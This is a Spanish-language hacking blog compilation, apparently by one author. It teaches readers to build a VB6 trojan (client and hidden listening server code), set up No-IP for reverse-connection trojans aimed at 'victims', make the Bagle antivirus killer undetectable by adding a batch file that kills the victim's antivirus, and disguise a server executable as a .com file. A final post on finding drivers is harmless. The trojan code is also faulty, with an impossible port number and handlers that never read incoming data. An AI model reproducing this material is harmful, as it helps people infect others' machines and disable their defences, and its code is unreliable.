Crea tu Troyano Personal en VB6

Hola, hoy les voy a enseñar como pueden crear un simple troyano en Visual Basic 6, antes de empezar te aviso que debes saber aunque sea lo basico en VB, o no vas a entender nada de lo que voy a explicar. Este texto va dedicado a "un viejo amigo", que tenia problemas para hacer indetectable el Bifrost, seguramente ustedes se cansaron de buscar encriptadores y por eso vienen aca.

.CAPITULO 1 - UN REPASO:

En primer lugar tenes que saber lo que es el componente "Microsoft Winsock". Es un componente que le podes agregar a tu aplicación para que pueda realizar conexiones locales o remotas, es lo que vamos a usar para que al presionar un boton, se conecte a la IP de la maquina infectada, obviamente tiene que tener el servidor corriendo, el cual va a funcionar escuchando tal puerto. Si queres crear un troyano de conexión inversa es tu desición, en el texto esta explicado como hacer un de conexión directa, pero con la practica y el estudio vas a aprender como hacerlos de otras formas.

.CAPITULO 1- CLIENTE DEL TROYANO DE CONEXION DIRECTA:

Si queres hacer uno de conexión directa, tenes que hacerlo de tal manera en la que el servidor sea el que escuche un puerto, y el cliente se conecte a la IP de la PC infectada a travez de el. Eso es muy facil, tenes que agregar al formulario los siguientes componentes:

. 4 Botones (los cuales tengan los nombres; Conectar, Desconectar, CMD y Notas).
. 1 Microsoft Winsock Control 6.0 (tiene que llamarse "Winsock1", igual ya viene asi por defecto, en la siguiente imagen vas a ver como agregarlo desde los componentes).
. 1 Caja de texto llamada "IP".



Despues de haber agregado todo lo necesario, hay que poner un codigo parecido a este que se ve abajo (explicado para los no-ignorantes):



'Troyano creado por Echeniqueitor

Private Sub Form_Load() 'Este "Sub" tiene las sentencias que se van a ejecutar cuando se inicie el troyano
IP.Text = Winsock1.LocalIP 'Esto es para que la caja de texto de la IP escriba la IP local como ejemplo, para hacerlo tiene que pedirle ayuda al Winsock, como se puede ver en el codigo
End Sub

Private Sub Conectar_Click() 'Estas son las sentencias que se van a ejecutar cuando se presione el boton de conectar
Winsock1.Close 'Esto sirve para que el Winsock cierre cualquier conexión previa a la anterior
Winsock1.Connect IP.Text, 261194 'Esto se conecta a la IP escrita en la caja de texto desde el puerto 261194, el numero es la fecha de mi cumpleaños
Me.Caption = "Troyano de Echeniqueitor - Conectado!!" 'Esto cambia el titulo del formulario a "Troyano de Echeniqueitor - Conectado!!", en el caso de que se conecte
End Sub

Private Sub Notas_Click() 'Este es el boton "Notas", el cual envia al servidor la orden de ejecutar el Bloc de notas
Winsock1.SendData "Notas" 'En el servidor esta especificada la orden "Notas", eso lo vas a ver a la hora de crearlo
End Sub

Private Sub CMD_Click() 'Esto abre el MS-Dos
Winsock1.SendData "CMD" 'CMD es la orden que lo ejecuta
End Sub

Private Sub Desconectar_Click() 'Esto desconecta al cliente del servidor
Winsock1.Close 'Cierra la conexion
Me.Caption = "Troyano de Echeniqueitor - Desconectado" 'Cambia el titulo a "Troyano de Echeniqueitor - Desconectado"
End Sub








.CAPITULO 2 - SERVIDOR DEL TROYANO DE CONEXIÓN DIRECTA:

El servidor del troyano es muy facil de crear, aca voy a exponer un codigo basico, si queres le podes agregar tambien Rootkits y Firewall Killer (para los que saben). Abri un nuevo Form, agrega un Winsock llamado "Winsock1" y escribi el siguiente codigo (antes podes guardar el source o ejecutable del cliente)


Private Sub Form_Load() 'Lo que va a pasar cuando el formulario se inicie
On Error Resume Next 'Ante cualquier problema continua sin avisar el error

Winsock1.LocalPort 261194 'El Winsock indica que el puerto 261194 tiene que ser escuchado
Winsock1.Listen 'Esto abre e inicia la escucha el puerto colocado anteriormente

Me.Visible = False 'Esto hace que el servidor se ejecute en modo oculto

End Sub

Private Sub Winsock1_DataArrival() 'Esto hace que el Winsock realice sus conexiones y acciones
Dim Datos As String 'Esto es para que la palabra Datos sea una variable para identificar los datos que el cliente le envie al servidor
If Datos = "Notas" Then GoTo Notas 'Si los datos son "Notas" va hasta : Notas
: Notas 'En la siguiente linea es donde se ejecuta el Bloc de Notas
a = Shell("NOTEPAD.EXE", 1) 'La aplicación Shell ejecuta archivos EXE, en este caso el Bloc de Notas 1 vez

If Datos = "CMD" Then GoTo CMD
: CMD
a = Shell("CMD.EXE", 1) 'Esto ejecuta el MS-Dos igual que el bloc de notas

End If 'Fin de las condicionales "If"

End Sub

Private Sub Winsock1_ConnectionRequest(ByVal RequestID As Long) 'Petición de la conexión

Winsock1.Close 'Cierra el Winsock

Winsock1.Accept RequestID 'Acepta la conexión

End Sub


No importa cual sea el titulo ni nada de eso, no tengas miedo al autoinfectarte porque no tiene nada malo, no se agrega al registro, no se copia y se puede ver el proceso.

No seas lammer, si queres hacer un troyano mejor que este, ponete a "estudiar" la programación en Visual Basic, si tomas este proyecto como gran cosa, es porque sos un N00B de primera (sin ofender) y si te crees hacker antes o después de saber esto, es porque sos otro l4m3r más que sobra en la Internet.


PD: No me hago responsable del mal uso de todo esto, el responsable sera el que lo use, no el que enseña. Ya que si pasa algo te voy a ignorar con las boludeces que escribas en los comentarios, anda a llorar a otro lado y aprende que el más poderoso e inteligente es quién sobrevive en esta eterna"guerra".

Atentamente: Echeniqueitor.

Creación y configuración de un Servidor No-IP [Actualizado Dom. 22/02/09 15:23pm]

En este texto vas a ver como podes crear un servidor No-IP, sirve para identificar tu dirección IP con una cuenta facil de recordar como Echeniqueitor.no-ip.biz y no con numeros como 192.168.0.1, esto tambien te puede servir si usas troyanos de conexión inversa, ya que tus victimas se conectan a la IP que vos escribiste en la configuración del servidor, el problema pasa al cambiar la ultima cifra de tu IP (por ejemplo de 200.118.48.245 a 200.118.48.246) las podes perder facilmente. El objetivo de tener un servidor como este es mantener identificada tu computadora con una dirección estatica (que nunca cambia) que una dinamica (que siempre cambia al conectarse).



Lo primero que hay que hacer es entrar en la pagina de No-IP y crear una cuenta, es demasiado facil, tanto que no tengo que decir aca como se hace, si sabes lo que es un IP ya deberias hacerlo sin mi ayuda.



Después de registrarte y logearte podes ver tus opciones, podes ir a "Add a Host" y crear un "host", el cual seria "ejemplo.no-ip.biz" o cualquier otro, eso depende de como lo quieras hacer.



Aca podes ver las opciones, podes elegir tu nombre y seleccionar como seria la ultima parte.



Una vez que tengas un host o más creados, podes ir a las opciones que se ven en la izquierda de la imagen y configurarlos o borrarlos.



Lo demás depende de lo que hagas, podes explorar la pagina y ver todo lo que se puede hacer, pero ahora voy a explicar algo más importate; Sólo creando un host no logras hacer nada, para aprovecharlos tenes que descargar el No-IP DUC, puede ser desde la misma pagina, o el No-IP DUC v2.2.1, ese es el de Cr4Sill, lo subi porque con el tiempo va a cambiar en mucho, entra en "Edit" y logeate con tu correo y contraseña con los que te registraste en No-IP.







Los hosts creados aparecen en el centro del cliente, si ves que estan con anteojos de sol es porque no estan activados (tu IP sigue identificandose con numeros y no con tu dirección).



Al activar las casillas, van a buscar tu IP actual y la van a reemplazar por su dirección, si la carita esta sonrrojada es porque esta activo (tu IP ya fue reemplazada, en mi caso por echeniqueitor.no-ip.biz). La del host JoseIgnac1o7-H0S3 no esta funcionando, ya que la ultima vez que lo use fue hace 3 meses.





Ahora para resolver esos problemas de IP, que pasan al cambiarla (en mi caso cuando tengo activado o desactivado el WiFi) hay que ir a "Options" y activar la auto-detección de IP.









Después de resolver el problema ya te funcionan los 2 hosts como si nada y cuando tengas que escribir tu IP, no tengas que complicarte con los cambios de cifra y anotandola todo el tiempo.

AV/FW Killer - Bagle.JR

El Bagle es uno de los mejores killers que se puede descargar, desactiva los antivirus y partes de seguridad del registro de windows, por ejemplo su Firewall y el Modo a prueba de errores. Muchos lo consideran un virus o troyano, pero no puede ser un virus, y mucho menos un troyano. El Bagle es un KILLER, una herramienta para desactivar la seguridad. En este post yo queria decirles como pueden sacarlo, pero si lo quieren descargar esta aca. No lo subi para que muchos lammers subnormales infecten a cualquiera, y NO ME HAGO RESPONSABLE DE SU USO. Si lo descargan van a ver que ya es detectado a cualquier antivirus, pero sabiendo programar, encriptar archivos sin dañar y modificar las firmas digitales, si se lo puede hacer indetectable, pero en el caso de ser n00b, es muy normal el no creerme y usar el Themida como siempre, puede ser que funcione, pero lo destruye.

CAPITULO 1 - EJECUCIÓN DEL KILLER.
...........................................................................

1. En la siguiente imagen van a ver como es su icono y su nombre predeterminado (Disable Windows XP Firewall 1.0). Quien lo propaga generalmente le pone otro nombre y le cambia el icono predeterminado.



2. En esta otra imagen se puede ver un "boton derecho", lo hise desde mi partición C, pueden ver que tengo muchos antivirus, tengo el SpyBot y el Trojan Remover (descarguenlos que son muy buenos xD). En C tambien tenia el Kaspersky, pero cuando probe ese Bagle me lo elimino y hasta ahora no lo recupero, aunque no tengo interes porque ya estoy usando la partición D. Si estas en modo seguro no se va a ejecutar.



3. Al ejecutarlo sale esto, eso hace que uno crea que es un crackeador de software, pero en realidad no crackea nada, cuando seleccionas algo te marca error, y si pones cancelar no sale nada.



4. Hagas lo que hagas, el servidor siempre va a hacer lo mismo, se va a inyectar a un proceso y va a descargar y ejecutar el Bagle desde un FTP o un Hosting, no se cual es la dirección, pero tarda segundos o minutos en hacerlo.

5. Cuando termine, va a cerrar los procesos de todos los antivirus activos, va a hacer visibles todos sus atributos ocultos, reemplaza algunos archivos importantes de todos los antivirus, y los va a dejar totalmente inútiles. En la siguiente imagen se puede ver que hay dos archivos con el mismo nombre, el avp.exe (kaspersky). Al ejecutarlo sale un mensaje como el de la imagen, y al iniciar Windows el antivirus nisiquiera se inicia.




6. Una vez que el Bagle termine su trabajo, se va a quedar guardado y oculto en System32 y sus subdirectorios, cuando hagas visibles los atributos de esa ubicación, no vas a ver nada, pero el Bagle si esta ahí.


CAPITULO 2 - COMO EVITAR QUE SE DESCARGUE AL SER EJECUTADO.
............................................................................................

1. Como dije antes, el que uno ejecuta suele ser un downloader, el killer esta en un servidor FTP o hosting. Se lo puede evitar con el KAV o KIS 2009. En mi caso es el KIS. Analize todo lo el directorio %programfiles% y %windir%. Encontre el downloader inyectado en la barra de herramientas de google. Si no analizaba nada, sistemas de seguridad muy avanzados como el Kaspersky llegarian a detectarlo cuando este por terminar la descargar y preguntarian por autorizar o bloquear al servidor.



2. Al ejecutarlo en mi partición D, el KIS ya lo detecto.



3. Despues de detectarlo te va a preguntar por eliminarlo, eso depende de la configuración que tenga tu antivirus. En mi caso lo elimine por completo.

CAPITULO 3 - COMO HACERLO INDETECTABLE AL %100.

..............................................................................................................

Esto es para los lammers e idiotas, vas a ver una simple explicación de como dejar el Bagle indetectable y funcional, sin dejarlo inservible.

Es muy facil, un truco es usar un encriptador que lo encapsule y no dañe el codigo, el problema es que cuando se extrae, antes de ejecutarse salta el antivirus. Para evitar que eso pase, podes adjuntarle un simple batch que mate el proceso del antivirus que use la victima, así nada va a evitar que haga su trabajo.

La mejor forma es sabiendo programar, se puede configurar el codigo de fuente para que sea indetectable, hasta en el caso que se analizen los directorios de instalación, en el último momento, cuando la victima siga teniendo antivirus.

CAPITULO 4 - COMO DESINFECTARSE.

..........................................................................

La desinfección es simple, solo hay que usar el EliBagle o el BagleGui para analizar toda la partición, sacarlo y despues reparar las partes del registro que hayan quedado deshabilitadas. Lo que yo hise fue analizar toda la partición con el BagleGui, que no me funcionó porque esa versión del Bagle estaba bien actualizada. Despues analize con el EliBagle, que si me permitió encontrarlo en sus ubicaciones basicas y eliminarlo. Después de reiniciar mi ordenador, busque ver la ubicación de la clave del inicio en Modo seguro, cuando la encontré la copie desde mi partición D y reemplazé la parte dañada que estaba en el Registro de Windows del disco C por la nueva. Ahora no tengo más problemas con eso, solo que el Firewall de Windows sigue sin funcionar, y sigo googleando "Reparar Firewall De Windows" y cosas así. Algo que puede ser util, es intentar actualizar Windows.

Herramientas:

.EliBagle.

.BagleGui 1.

.BagleGui 2.

Espero que esta información te sirva.

Cualquier cosa podes dejar un comentario, lo voy a responder.

Atte: Echeniqueitor.

Compilar EXE Cualquier Formato (COM, Batch, etc..)

Sé que este mes estuve un poco "alejado" del blog, pero ahora voy a empezar a subir más manuales. Hoy vas a ver como pasar un archivo Ejecutable EXE, a formato de Comando COM. Tambien se puede convertir un Batch (*.bat) en *.cmd. O mejor, un EXE en un Batch. Yo creo que funciona bien solo cuando es para cambiar formatos a archivos que son del mismo tipo, por ejemplo de *.jpg a *.bmp. Es muy facil, la principal función de esta Herramienta de Windows llamada PACKAGER es crear paquetes SHS (*.shs), como lo dije en mis otros posts.

Materiales:
.Cerebro (si sos otro lammer que se cree hacker sin saber esto, mejor sali de aca porque no me caes bien xD)
.Windows XP Como Minimo (yo solo lo probe con Windows XP WOLF y SP2)
.PACKAGER

Procedimiendo:

1. Ejecutar el PACKAGER, su ubicación esta en el directorio de Windows o System32, se puede encontrar el archivo PACKAGER.EXE o packager.exe. O más simple ejecutar packager.

2. Ir a Archivo > Importar y seleccionar el archivo.

3. Ir a Guardar contenido y escribir el nombre del archivo, pero al final ponerle formato *.com. Si tenes un archivo llamado Server.exe, lo podes cambiar a Server.com.



Despues si vas a ver el directorio donde lo guardaste, si tenes configurada la vista para que se vea la extension, vas a ver que el servidor tiene formato *.com y cuando lo abras vas a ver que si te funciona.


Los hackers saben todo, los lammers creen que saben algo, y los expertos que estudian para ser hackers ayudamos demasiado a la gente.

Solución Al Problema De DRIVERS No Encontrados

Hola, este post va dedicado a los que tienen problemas cuando quieren descargar los controladores para su computadora, aveces cuando queres buscar en google o yahoo los nombres de los drivers, no aparecen, o solo te muestran resultados relacionados e inútiles. A mi me pasaba cuando buscaba "Acer Drivers", "Drivers Acer Aspire 4720Z", y otras cosas. Nunca podia encontrar los drivers, hasta que encontre un programa muy bueno llamado "EVEREST", se puede encontrar con google o softonic. Lo que se puede hacer es instalarlo y despues ejecutarlo, cuando lo hagas vas a ver todos los datos de tu PC, o en algunos casos PCs Remotas. Con eso descubrí que los drivers (controladores) que tengo que buscar no son fabricados por ACER, ya que Acer solamente tiene drivers para Windows Vista, es como una "trampa" especial para que nadie pueda tener una Acer con Windows XP facilmente. Quienes tenian los controladores que yo necesitaba eran los de Atheros. En la imagen pueden ver una linea marcada con rojo, ahí se puede ver que dice el nombre del Driver WiFi que tengo que buscar, yo lo copie, lo pegue en google y me salio una pagina llamada http://www.opendrivers.com que tenia TODO. Al final pude bajar todo lo que queria.

Espero que este manual les sirva a todos de ayuda.






Nota: Mucho cuidado con algunos controladores, por ejemplo los de Video, ya que aveces no son soportados y causan muchos errores. Si tenes una computadora portatil "Acer - Aspire 4720Z", de esas que por defecto vienen con Windows Vista, pero se lo queres cambiar a XP, debido a sus errores.